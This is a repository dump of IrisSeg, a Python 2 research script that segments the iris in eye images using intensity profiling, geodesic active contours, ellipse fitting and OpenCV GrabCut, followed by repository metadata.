graph\n assert self._graph is not None\n self._learning_rate = learning_rate\n self._discount_factor = discount_factor\n self._episodes = steps\n\n def optimize(self, episode_num, stack, next_state, done):\n self._episode = episode_num\n\n # update actions on stack in reverse order\n for idx in reversed(range(len(stack))):\n action, _, state = stack[idx]\n if not action.is_done(next_state) and not done:\n return\n if action.is_primitive():\n parent_action, _, _ = stack[idx - 1]\n reward = 0 if parent_action.is_done(next_state) else -1\n self._update_v(action, state, reward)\n else:\n sub_action, ticks, state = stack[idx + 1]\n self._update_c(\n action,\n state,\n sub_action,\n ticks,\n next_state)\n\n def _update_v(self, action, state, reward):\n assert action.is_primitive()\n v = self._graph.get_v(action, state)\n v = _move(v, reward, self._learning_rate, self._episode, self._episodes)\n self._graph.set_v(action, state, v)\n\n def _update_c(self, action, state, sub_action, ticks, next_state):\n assert not action.is_primitive()\n target = np.power(self._discount_factor, ticks) * self._graph.get_v(action, next_state)\n c = self._graph.get_c(action, state, sub_action)\n c = _move(c, target, self._learning_rate, self._episode, self._episodes)\n self._graph.set_c(action, state, sub_action, c)\n" }, { "alpha_fraction": 0.5424247980117798, "alphanum_fraction": 0.5516184568405151, "avg_line_length": 28.162012100219727, "blob_id": "58a8a6cede24423b417a8693cd5103f320b457f4", "content_id": "2e234f4e7972a82795d0801412575d39e69c36cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5229, "license_type": "no_license", "max_line_length": 73, "num_lines": 179, "path": "/hierarchical-with-maxq-decomposition/main.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport gym\n\nimport rl\nfrom taxi import evaluate, print_best_actions, print_v, print_c, print_q\n\n\nn_episodes = 
10000\nmax_steps = 200\n\n\n# Taxi-v2 specific graph\ndef create_graph(env):\n env = env.unwrapped\n # Creating graph from bottom to the top\n target_coords = [(0, 0), (4, 0), (0, 4), (3, 4)]\n\n # Navigate tasks (parameterized)\n navigate_tasks = [\n create_navigate_task(env, target_coord)\n for target_coord in target_coords\n ]\n\n # Dropoff\n def dropoff_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, dest_idx\n dropoff = rl.Task(\"D\", 5, state_tr=dropoff_state)\n\n # Pickup\n def pickup_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_y, taxi_x, pass_idx\n pickup = rl.Task(\"P\", 4)\n\n # Get task\n def pickup_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, pass_idx\n\n def picked_up(state):\n taxi_x, taxi_y, pass_idx = state\n return pass_idx == 4\n\n get = rl.Task(\"get\", state_tr=pickup_state, term_predicate=picked_up)\n get += pickup\n for navigate_task in navigate_tasks:\n get += navigate_task\n\n # Put task\n def put_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, pass_idx, dest_idx\n\n def taxi_empty(state):\n taxi_x, taxi_y, pass_idx, dest_idx = state\n return pass_idx != 4\n\n put = rl.Task(\"put\", state_tr=put_state, term_predicate=taxi_empty)\n put += dropoff\n for navigate_task in navigate_tasks:\n put += navigate_task\n\n # Root task\n # TODO: term_predicate\n root = rl.Task(\"root\", term_predicate=lambda state: False)\n root += get\n root += put\n return root\n\n\ndef create_navigate_task(env, target_coord):\n env = env.unwrapped\n def coord_and_target_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y, target_coord[0], target_coord[1]\n # Creating graph from bottom to the top\n south = rl.Task(\"↓\", 0, state_tr=coord_and_target_state)\n north = rl.Task(\"↑\", 1, state_tr=coord_and_target_state)\n east = rl.Task(\"→\", 2, state_tr=coord_and_target_state)\n west = rl.Task(\"←\", 3, state_tr=coord_and_target_state)\n\n # Navigate task\n def coord_state(state):\n taxi_y, taxi_x, pass_idx, dest_idx = env.decode(state)\n return taxi_x, taxi_y\n\n def reached_target(state):\n taxi_x, taxi_y = state\n x, y = target_coord\n return x == taxi_x and y == taxi_y\n\n navigate = rl.Task(\n \"navigate\",\n params=target_coord,\n state_tr=coord_state,\n term_predicate=reached_target)\n navigate += north\n navigate += south\n navigate += east\n navigate += west\n\n return navigate\n\n\ndef train(env, graph=None):\n global n_episodes\n global max_steps\n\n if graph is None:\n graph = rl.get_default_graph()\n assert graph is not None\n\n optimizer = rl.Optimizer(\n graph=graph,\n learning_rate=0.5,\n discount_factor=1.0,\n steps=n_episodes)\n root = graph.root()\n\n for i in range(n_episodes):\n state = env.reset()\n stack = [(root, 0, state)] # action, ticks, state0\n step = 0\n\n try:\n for _ in range(max_steps):\n if root.is_done(state):\n break\n k = min(1.0, float(i) / float(n_episodes * 0.33))\n k = 1.0 - k\n epsilon = 0.05 * k\n action, stack = rl.get_action(\n graph,\n stack,\n state,\n epsilon=epsilon)\n next_state, reward, done, debug = env.step(action)\n optimizer.optimize(i, stack, next_state, done)\n state = next_state\n step += 1\n if done:\n break\n except KeyError as error:\n print('episode {}, step {}'.format(i, step))\n print('state: {}', list(env.unwrapped.decode(state)))\n env.render()\n rl.print_stack(stack)\n raise error\n\n print(\"{} solved 
in {} steps\".format(i, step))\n env.render()\n print('== best_action ==')\n print_best_actions(env.unwrapped, graph)\n print('== V ==')\n print_v(env.unwrapped, graph, root)\n for sub_task in root.get_actions():\n print('== Q({}) =='.format(sub_task.name))\n print_q(env.unwrapped, graph, root, sub_task)\n print('== C({}) =='.format(sub_task.name))\n print_c(env.unwrapped, graph, root, sub_task)\n print('C map size: {}'.format(len(graph._c)))\n # for k, v in graph._c.items():\n # print(k, v)\n print('V map size: {}'.format(len(graph._v)))\n # for k, v in graph._v.items():\n # print(k, v)\n\n\nif __name__ == '__main__':\n env = gym.make('Taxi-v2')\n # target_coord = (3, 4)\n root = create_graph(env)\n root = root.get(\"get\")\n\n graph = rl.Graph(root)\n train(env, graph=graph)\n evaluate(env, graph)\n env.close()\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 62.25, "blob_id": "343b2d8d34cf00070aa3779305c362a5c6134399", "content_id": "8c4aac5dd68a95561dc5a7bc849f120078a1ba22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 253, "license_type": "no_license", "max_line_length": 101, "num_lines": 4, "path": "/README.md", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "# Reproducing experiments from the book \"Reinforcement Learning\" by Sutton and Barto (second edition)\n\nThis repository is for educational purposes (Learning by doing).\nHere I reproduce the experiments and implement core deep RL algorithms from scratch.\n" }, { "alpha_fraction": 0.5238811373710632, "alphanum_fraction": 0.5344114303588867, "avg_line_length": 26.412370681762695, "blob_id": "0314bd9b4054c95790c95e5517a7e728716a19f7", "content_id": "bb696a89955b9063e287b694591486becbd1e050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2659, "license_type": "no_license", "max_line_length": 74, "num_lines": 97, "path": "/hierarchical-with-maxq-decomposition/taxi/evaluate.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import sys\nimport time\nfrom six import StringIO\n\nimport rl\n\n\ndef _print_env(env, fn, pass_idx=3, dest_idx=0, mode='human'):\n outfile = StringIO() if mode == 'ansi' else sys.stdout\n\n outfile.write(\"+----------+\\n\")\n for y in range(0, 5):\n outfile.write(\"|\")\n for x in range(0, 5):\n state = env.unwrapped.encode(y, x, pass_idx, dest_idx)\n outfile.write(fn(state) + \" \")\n outfile.write(\"|\")\n outfile.write(\"\\n\")\n outfile.write(\"+----------+\\n\")\n\n if mode != 'human':\n s = outfile.getvalue()\n outfile.close()\n return s\n\n\ndef print_best_actions(env, graph, mode='human'):\n def fn(state):\n action = graph.root()\n while not action.is_primitive():\n action = graph.get_best_action(action, state)\n return action.name\n return _print_env(env, fn, mode=mode)\n\n\ndef print_v(env, graph, action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_v(action, state)))\n\n\ndef print_c(env, graph, action, child_action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_c(action, state, child_action)))\n\n\ndef print_q(env, graph, action, child_action, pass_idx=3, dest_idx=0):\n _print_env(env, lambda state: \"{: 1.4f}\".format(\n graph.get_q(action, state, child_action)))\n\n\ndef evaluate(env, graph):\n episode = 0\n while True:\n print(\"== Episode {} ==\".format(episode))\n _play_episode(env, graph)\n 
episode += 1\n\n\ndef _play_episode(env, graph):\n root = graph.root()\n state = env.reset()\n stack = [(root, 0, state)]\n\n done = False\n step = 0\n\n while not done:\n if root.is_done(state):\n break\n\n action, stack = rl.get_action(\n graph,\n stack,\n state,\n epsilon=0.0)\n state, reward, done, debug = env.step(action)\n\n env_str = env.render(mode='ansi').getvalue()\n env_str = env_str.split('\\n')\n action_str = print_best_actions(env, graph, mode='ansi')\n action_str = action_str.split('\\n')\n\n print(\"Step {}\".format(step))\n print(\" state: {}\".format(list(env.unwrapped.decode(state))))\n idx = 0\n for env_line, action_line in zip(env_str, action_str):\n stack_str = \"\"\n if idx < len(stack):\n task, ticks, _ = stack[idx]\n stack_str = \"({} {})\".format(task.name, ticks)\n idx += 1\n print(\" {} {} {}\".format(env_line, action_line, stack_str))\n print()\n\n step += 1\n\n time.sleep(1)\n" } ]
15
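The hierarchical-with-maxq-decomposition package above is organized around the MAXQ identity implemented in graph.py's get_q: Q(parent, s, a) = V(a, s) + C(parent, s, a), where the value of a composite task is the Q-value of its greedy child. A dictionary-only sketch of that recursion, reusing the numbers from test_graph.py (task names are plain strings here, not rl.Task objects):

from collections import defaultdict

V = defaultdict(float)  # (primitive_task, state) -> expected reward of executing it
C = defaultdict(float)  # (parent, state, subtask) -> reward-to-go after subtask ends

def q(parent, state, subtask):
    # MAXQ decomposition: Q(parent, s, a) = V(a, s) + C(parent, s, a)
    return V[(subtask, state)] + C[(parent, state, subtask)]

def v(parent, state, subtasks):
    # The value of a composite task is the Q-value of its best subtask.
    return max(q(parent, state, a) for a in subtasks)

# Same numbers as test_graph.py: going down costs -1 but leaves little
# for the parent to finish; going right is a dead end.
V[("down", (0, 0))] = -1.0
V[("right", (0, 0))] = -100.0
C[("root", (0, 0), "down")] = 0.3
print(v("root", (0, 0), ["down", "right"]))  # -0.7

Storing C separately is the point of the decomposition: a subtask's V can be learned once and reused under any parent, with only the completion term being parent-specific.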
pars3c/prediction_model_1
https://github.com/pars3c/prediction_model_1
493a5e2466103d6d6c061dab0461382fa1b5993a
68f70ef7d92062150f895d4612780a93e2daf250
f4450de681ec633d9609e72e7bfe98e435510a8e
refs/heads/master
2021-05-06T20:18:36.781312
2017-11-30T15:18:17
2017-11-30T15:18:17
112380458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47431233525276184, "alphanum_fraction": 0.5318003296852112, "avg_line_length": 62.62963104248047, "blob_id": "6d388048e566257b88bd31df108986a3f03a5ea0", "content_id": "e8a64e99cf494bb446b8da9deb14fa0f9e2c64c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6871, "license_type": "no_license", "max_line_length": 154, "num_lines": 108, "path": "/data_format.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "import pandas as pd\ndef data_form2():\n csv_path = \"survey_new.csv\"\n data = pd.read_csv(csv_path, sep=\",\")\n df = pd.DataFrame(data)\n df[\"Country\"] = df[\"Country\"].replace(['United States', 'Canada', 'United Kingdom', 'Bulgaria', 'France', 'Portugal',\n 'Netherlands', 'Switzerland', 'Latvia', 'Germany', 'Ireland', 'Romania',\n 'Belgium', 'Sweden', 'New Zealand', 'Zimbabwe', 'Brazil', 'Spain', 'India',\n 'Finland', 'Uruguay', 'Australia', 'Israel', 'Italy', 'Bosnia and Herzegovina',\n 'Austria', 'Hungary', 'Singapore', 'Poland', 'Japan', 'Nigeria', 'Russia',\n 'South Africa', 'Croatia', 'Norway', 'Thailand', 'Denmark', 'Mexico',\n 'Bahamas', 'Greece', 'Moldova', 'Colombia', 'Georgia', 'China',\n 'Czech Republic', 'Philippines', 'Slovenia', 'Costa Rica'],['1', '2', '3', '4', '5', '6',\n '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25',\n '26', '27', '28', '29', '30', '31', '32',\n '33', '34', '35', '36', '37', '38',\n '39', '40', '41', '42', '43', '44',\n '45', '46', '47', '48'])\n df[\"Country\"] = df[\"Country\"].astype(int)\n\n return df[\"Country\"]\ndef data_form():\n \n csv_path = \"survey_new.csv\"\n data = pd.read_csv(csv_path, sep=\",\")\n df = pd.DataFrame(data)\n\n \n df[\"Year\"] = df.Timestamp.str.split(\"-\").str.get(0)\n df[\"Year\"] = df[\"Year\"].astype(int)\n df[\"Month\"] = df.Timestamp.str.split(\"-\").str.get(1)\n df[\"Month\"] = df[\"Month\"].astype(int)\n df[\"Day\"] = df.Timestamp.str.split(\"-\").str.get(2)\n df[\"Day\"] = df.Day.str.split(\" \").str.get(0)\n df[\"Day\"] = df[\"Day\"].astype(int)\n df[\"Age\"] = df[\"Age\"].astype(int)\n df[\"Gender\"] = df[\"Gender\"].astype(int)\n \n df[\"Country\"] = df[\"Country\"].replace(['United States', 'Canada', 'United Kingdom', 'Bulgaria', 'France', 'Portugal',\n 'Netherlands', 'Switzerland', 'Latvia', 'Germany', 'Ireland', 'Romania',\n 'Belgium', 'Sweden', 'New Zealand', 'Zimbabwe', 'Brazil', 'Spain', 'India',\n 'Finland', 'Uruguay', 'Australia', 'Israel', 'Italy', 'Bosnia and Herzegovina',\n 'Austria', 'Hungary', 'Singapore', 'Poland', 'Japan', 'Nigeria', 'Russia',\n 'South Africa', 'Croatia', 'Norway', 'Thailand', 'Denmark', 'Mexico',\n 'Bahamas', 'Greece', 'Moldova', 'Colombia', 'Georgia', 'China',\n 'Czech Republic', 'Philippines', 'Slovenia', 'Costa Rica'],['1', '2', '3', '4', '5', '6',\n '7', '8', '9', '10', '11', '12',\n '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25',\n '26', '27', '28', '29', '30', '31', '32',\n '33', '34', '35', '36', '37', '38',\n '39', '40', '41', '42', '43', '44',\n '45', '46', '47', '48'])\n df[\"Country\"] = df[\"Country\"].astype(int)\n df[\"state\"] = df[\"state\"].fillna(\"NA\").replace(['NA', 'IL', 'IN', 'TX', 'TN', 'MI', 'OH', 'CA', 'CT', 'MD', 'NY', 'NC', 'MA', 'IA', 'PA',\n 'WA', 'WI', 'SC', 'OR', 'VT', 'UT', 'SD', 'CO', 'AL', 'OK', 'GA', 'NV', 'NJ', 'NH', 'ID',\n 'MS', 'KY', 'AZ', 'VA', 'KS', 'MN', 'FL', 'RI', 'WY', 'MO', 'NM', 'NE', 'LA', 'DC', 'ME',\n 'WV'], 
['-9999', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30',\n '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45'\n ])\n df[\"state\"] = df[\"state\"].astype(int)\n df['self_employed'] = df['self_employed'].fillna(\"-9999\").replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"self_employed\"] = df[\"self_employed\"].astype(int)\n df['family_history'] = df['family_history'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"family_history\"] = df[\"family_history\"].astype(int)\n df['treatment'] = df['treatment'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"treatment\"] = df[\"treatment\"].astype(int)\n df['work_interfere'] = df['work_interfere'].fillna(\"-9999\").replace([\"Sometimes\", \"Often\", \"Rarely\", \"Never\"], [\"3\", \"2\", \"1\", \"0\"])\n df[\"work_interfere\"] = df[\"work_interfere\"].astype(int)\n df['no_employees'] = df['no_employees'].replace([\"1-5\", \"6-25\", \"26-100\", \"100-500\", \"500-1000\", \"More than 1000\"], [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"])\n df[\"no_employees\"] = df[\"no_employees\"].astype(int)\n df['remote_work'] = df['remote_work'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"remote_work\"] = df[\"remote_work\"].astype(int)\n df['tech_company'] = df['tech_company'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"tech_company\"] = df[\"tech_company\"].astype(int)\n df['benefits'] = df['benefits'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"benefits\"] = df[\"benefits\"].astype(int)\n df['care_options'] = df['care_options'].replace([\"Yes\", \"No\", \"Not sure\"], [\"1\", \"0\", \"-9999\"])\n df[\"care_options\"] = df[\"care_options\"].astype(int)\n df['seek_help'] = df['seek_help'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"seek_help\"] = df[\"seek_help\"].astype(int)\n df['anonymity'] = df['anonymity'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"anonymity\"] = df[\"anonymity\"].astype(int)\n df['leave'] = df['leave'].replace([\"Don't know\", \"Very easy\", \"Somewhat easy\", \"Somewhat difficult\", \"Very difficult\"], [\"-9999\", \"1\", \"2\", \"3\", \"4\"])\n df[\"leave\"] = df[\"leave\"].astype(int)\n df['mental_health_consequence'] = df['mental_health_consequence'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_health_consequence\"] = df[\"mental_health_consequence\"].astype(int)\n df['phys_health_consequence'] = df['phys_health_consequence'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"phys_health_consequence\"] = df[\"phys_health_consequence\"].astype(int)\n df['coworkers'] = df['coworkers'].replace([\"Yes\", \"No\", \"Some of them\"], [\"1\", \"0\", \"2\"])\n df[\"coworkers\"] = df[\"coworkers\"].astype(int)\n df['supervisor'] = df['supervisor'].replace([\"Yes\", \"No\", \"Some of them\"], [\"1\", \"0\", \"2\"])\n df[\"supervisor\"] = df[\"supervisor\"].astype(int)\n df['mental_health_interview'] = df['mental_health_interview'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_health_interview\"] = df[\"mental_health_interview\"].astype(int)\n df['phys_health_interview'] = df['phys_health_interview'].replace([\"Yes\", \"No\", \"Maybe\"], [\"1\", \"0\", \"-9999\"])\n df[\"phys_health_interview\"] = df[\"phys_health_interview\"].astype(int)\n df['mental_vs_physical'] = 
df['mental_vs_physical'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"mental_vs_physical\"] = df[\"mental_vs_physical\"].astype(int)\n df['obs_consequence'] = df['obs_consequence'].replace([\"Yes\", \"No\"], [\"1\", \"0\"])\n df[\"obs_consequence\"] = df[\"obs_consequence\"].astype(int)\n df['wellness_program'] = df['wellness_program'].replace([\"Yes\", \"No\", \"Don't know\"], [\"1\", \"0\", \"-9999\"])\n df[\"wellness_program\"] = df[\"wellness_program\"].astype(int)\n \n return df" }, { "alpha_fraction": 0.5560538172721863, "alphanum_fraction": 0.6188340783119202, "avg_line_length": 30.809524536132812, "blob_id": "77da3d5ecfa0a41cf562f17a94644eca8adb0f04", "content_id": "c5718790a7d57bce914ba9b9f26f1332f1287f0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 106, "num_lines": 21, "path": "/load_data.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "from keras.models import Sequential\nfrom keras.layers import Dense \nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nimport pandas as pd\nimport numpy as np\n\npred_data = np.array([[ 32, 0, -9999, -9999, 0, 0, 1, 2, 0, 1, 0, 0,\n 0, 0, -9999, 3, 0, 0, 1, 1, 1, 1, 0, 0,\n 2014, 8, 27]])\n\n\nmy_model = load_model(\"model_file.h5\")\npredictions = my_model.predict(pred_data) \n\n# Keep the raw model output: predicted_prob_true\npredicted_prob_true = predictions \n\n# print predicted_prob_true\nprint(predicted_prob_true) \n" }, { "alpha_fraction": 0.7233782410621643, "alphanum_fraction": 0.7454100251197815, "avg_line_length": 21.72222137451172, "blob_id": "38b99f57423011d103d39faf2e8e7c448edf039e1c", "content_id": "48c91d423011d103d39faf2e8e7c448edf039e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 79, "num_lines": 36, "path": "/__main__.py", "repo_name": "pars3c/prediction_model_1", "src_encoding": "UTF-8", "text": "import string\nimport os\nfrom keras.models import Sequential\nfrom keras.layers import Dense \nfrom keras.callbacks import EarlyStopping\nfrom keras.models import load_model\nimport pandas as pd\nimport numpy as np\nfrom data_format import data_form, data_form2\n\nearly_stopping_monitor = EarlyStopping(patience=5)\n\ndf = data_form()\ndf2 = data_form2()\n\n\ndf = df.drop(['Timestamp'], axis=1)\ndf = df.drop(['Country'], axis=1)\npredictors = df.as_matrix()\ntarget = df2.as_matrix()\n\n\n\n\nn_cols = predictors.shape[1]\nmodel = Sequential()\n\nmodel.add(Dense(200, input_shape = (n_cols,)))\nmodel.add(Dense(32))\nmodel.add(Dense(1))\n\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\nmodel.fit(predictors, target, epochs=500, callbacks = [early_stopping_monitor])\n# Save the trained model for reuse by load_data.py\nmodel.save(\"model_file.h5\")" } ]
3
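data_format.py above encodes every survey column by spelling out each category in long, hand-written replace([...], [...]) pairs. A hedged sketch of the same integer encoding using pandas.factorize on toy rows; the column names are the survey's, but factorize numbers categories by first appearance, so the codes would not match the repo's hand-assigned 1..48 labels:

import pandas as pd

df = pd.DataFrame({
    "Country": ["United States", "Canada", "United States", "Portugal"],
    "self_employed": ["Yes", None, "No", "Yes"],
})

# factorize() assigns one integer per distinct value (and -1 for NaN),
# replacing a hand-maintained replace([...], [...]) list per column.
codes, countries = pd.factorize(df["Country"])
df["Country"] = codes

# Binary columns with a missing-value sentinel, as in the original encoding.
df["self_employed"] = (
    df["self_employed"].map({"Yes": 1, "No": 0}).fillna(-9999).astype(int)
)

print(df)
print(list(countries))  # position -> original label, usable for decoding later

Keeping the returned uniques index also gives a way to decode model outputs back to labels, which the one-way mapping in the repo does not.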
pedrosanchesagftec/IrisSeg
https://github.com/pedrosanchesagftec/IrisSeg
4928053bd811fc65c6cbba54cb09041cb0f8a2d0
f5895580166734e17a85bc9a85a1a81186ea372d
bb83a62773133b36daec0d77833a20f73d4510f8
refs/heads/master
2022-01-09T13:45:48.231782
2018-06-06T15:46:21
2018-06-06T15:46:21
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48652973771095276, "alphanum_fraction": 0.5295321941375732, "avg_line_length": 27.057451248168945, "blob_id": "9e2b0660c3236e37ea250f4846c4dbb94f0d2231", "content_id": "15b17de55a080c1706908e0cb914b8de0d34fa01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15627, "license_type": "no_license", "max_line_length": 103, "num_lines": 557, "path": "/GrabCutIris_LevelSets_Ellipse.py", "repo_name": "pedrosanchesagftec/IrisSeg", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport sys\nimport time\nimport morphsnakes\nfrom cv2 import cv\nfrom scipy.misc import imread\nfrom matplotlib import pyplot as ppl\nimport urllib2\nimport math\nimport random\nimport os\n#import cv2.cv as cv\n\nprint '*** Iris segmentation using GAC and GrabCut (PSIVT Workshops 2015) ***'\nprint '*** Authors - Sandipan Banerjee & Domingo Mery ***'\nprint '*** Usage - python GrabCutIris_LevelSets_Ellipse.py <filename> *** \\n'\n\nsegF = 'SegResults'\nif not os.path.exists(segF):\n os.makedirs(segF)\n#f1 = open('resultsFinal.txt','a+')\nlvl_left = -1\nlvl_right = -1\nlvl_up = -1\nlvl_down = -1\n\np_left = -1\np_right = -1\np_up = -1\np_down = -1\n\nBLUE = [255,0,0] # rectangle color\nRED = [0,0,255] # PR BG\nGREEN = [0,255,0] # PR FG\nBLACK = [0,0,0] # sure BG\nWHITE = [255,255,255] # sure FG\n\nDRAW_BG = {'color' : GREEN, 'val' : 0}\nDRAW_FG = {'color' : RED, 'val' : 1}\nDRAW_PR_FG = {'color' : BLACK, 'val' : 3}\nDRAW_PR_BG = {'color' : WHITE, 'val' : 2}\n\ntemp_det = []\nlastcx = -1\nlastcy = -1\nlastr = -1\n#print __doc__\n\n# Loading images\nif len(sys.argv) == 2:\n filename = sys.argv[1] # for drawing purposes\nelse:\n print 'Image not found!'\n\n#f1.write(filename)\n#f1.write(',')\n\nimg = cv2.imread(filename)\nimg2 = img.copy() # copies of the original image\nimg3 = img.copy()\ncimg = img.copy()\n#img4 - img.copy()\neyeball_bw = np.zeros(img.shape,np.uint8)\niris_bw = np.zeros(img.shape,np.uint8)\niter = 0\n#img2 = img.copy() \n\n# Stage 1 - Intensity profiling\n\nh,w,d = img.shape\nh3 = h/3\nw3 = w/3\n\nlft = 1*w3\nrt = 2*w3\nup = 1*h3\ndown = 2*h3\n\nhor_l = [0]*(int(down-up)/5 + 1)\nver_l = [0]*(int(rt-lft)/5 + 1)\ntemp_l = []\nhor_list = []\nver_list = []\nmin_val = 100\nellipse_size = 0\nmin_x = 0\nmin_y = 0\nmaxf = 0\nmaxs = 0\neoc = 0\n\ni = lft\nj = up\nwhile i <= rt:\n j = up\n while j <= down:\n if int(img[j][i][0]) < min_val:\n min_val = int(img[j][i][0])\n j += 1\n i += 1\n\nm = 0\nn = up\nk = 0\nmax_blah = 0\nwhile n <= down:\n m = lft\n while m <= rt:\n temp = int(img[n][m][0])\n if temp < (min_val + 20):\n hor_l[k] += 1 \n img3[n][m] = (0,255,0)\n temp_l.append([m,n])\n else:\n img3[n][m] = (255,255,255)\n m += 1\n if hor_l[k] > max_blah:\n max_blah = hor_l[k]\n hor_list = temp_l\n temp_l = []\n n += 5\n k += 1\n \nfor i in range(len(hor_list)):\n img3[int(hor_list[i][1])][int(hor_list[i][0])] = (0,0,255)\n\nmax_t = max_blah\n\nm = 0\nn = lft\nk = 0\nmax_blah = 0\ntemp_l = []\nwhile n <= rt:\n m = up\n while m <= down:\n temp = int(img[m][n][0])\n if temp < (min_val + 20):\n ver_l[k] += 1 \n img3[m][n] = (0,255,0)\n temp_l.append([n,m])\n else:\n img3[m][n] = (255,255,255)\n m += 1\n if ver_l[k] > max_blah:\n max_blah = ver_l[k]\n ver_list = temp_l\n temp_l = []\n n += 5\n k += 1\n \nfor i in range(len(ver_list)):\n img3[int(ver_list[i][1])][int(ver_list[i][0])] = (255,0,0)\n \nif max_blah > max_t:\n max_t = max_blah\n\ncx = 0\ncy = 0\nhlst = []\nvlst = []\nsumh = 0\nsumv = 0\n\ni = lft\n\nwhile i <= 
rt:\n j = up\n while j <= down:\n if int(img[j][i][0]) < (min_val + 20):\n hlst.append(i)\n sumh += i\n vlst.append(j)\n sumv += j\n j += 1\n i += 1\n\ncx = int(sumh/len(hlst))\ncy = int(sumv/len(vlst)) \ncx1 = 0\ncy1 = 0\n\nfor i in range(len(hor_list)):\n for j in range(len(ver_list)):\n if (hor_list[i][0] == ver_list[j][0]) and (hor_list[i][1] == ver_list[j][1]):\n cx1 = hor_list[i][0]\n cy1 = hor_list[i][1]\n break\n \nimg3[cy][cx] = (255,255,255)\n\n# Stage 2 - Contour estimation with GAC\n\n# setting up flags\nrect = (0,0,1,1)\ndrawing = False # flag for drawing curves\nrectangle = False # flag for drawing rect\nrect_over = False # flag to check if rect drawn\nrect_or_mask = 100 # flag for selecting rect or mask mode\nvalue = DRAW_FG # drawing initialized to FG\nthickness = 3 # brush thickness\noutput_file = []\niteration = 1\n\n\ndef contour_iterator(contour):\n while contour:\n yield contour\n contour = contour.h_next()\n \nclass FitEllipse:\n\n def __init__(self, source_image, slider_pos):\n self.source_image = source_image\n cv.CreateTrackbar(\"Threshold\", \"Result\", slider_pos, 255, self.process_image)\n self.process_image(slider_pos)\n\n def process_image(self, slider_pos):\n global cimg, source_image1, ellipse_size, maxf, maxs, eoc, lastcx,lastcy,lastr\n \"\"\"\n This function finds contours, draws them and their approximation by ellipses.\n \"\"\"\n stor = cv.CreateMemStorage()\n\n # Create the destination images\n cimg = cv.CloneImage(self.source_image)\n cv.Zero(cimg)\n image02 = cv.CloneImage(self.source_image)\n cv.Zero(image02)\n image04 = cv.CreateImage(cv.GetSize(self.source_image), cv.IPL_DEPTH_8U, 3)\n cv.Zero(image04)\n\n # Threshold the source image. This needful for cv.FindContours().\n cv.Threshold(self.source_image, image02, slider_pos, 255, cv.CV_THRESH_BINARY)\n\n # Find all contours.\n cont = cv.FindContours(image02,\n stor,\n cv.CV_RETR_LIST,\n cv.CV_CHAIN_APPROX_NONE,\n (0, 0))\n \n maxf = 0\n maxs = 0\n size1 = 0\n \n for c in contour_iterator(cont):\n if len(c) > ellipse_size:\n PointArray2D32f = cv.CreateMat(1, len(c), cv.CV_32FC2)\n for (i, (x, y)) in enumerate(c):\n PointArray2D32f[0, i] = (x, y)\n \n \n # Draw the current contour in gray\n gray = cv.CV_RGB(100, 100, 100)\n cv.DrawContours(image04, c, gray, gray,0,1,8,(0,0))\n \n if iter == 0:\n strng = segF + '/' + 'contour1.png'\n cv.SaveImage(strng,image04)\n color = (255,255,255)\n \n (center, size, angle) = cv.FitEllipse2(PointArray2D32f)\n \n # Convert ellipse data from float to integer representation.\n center = 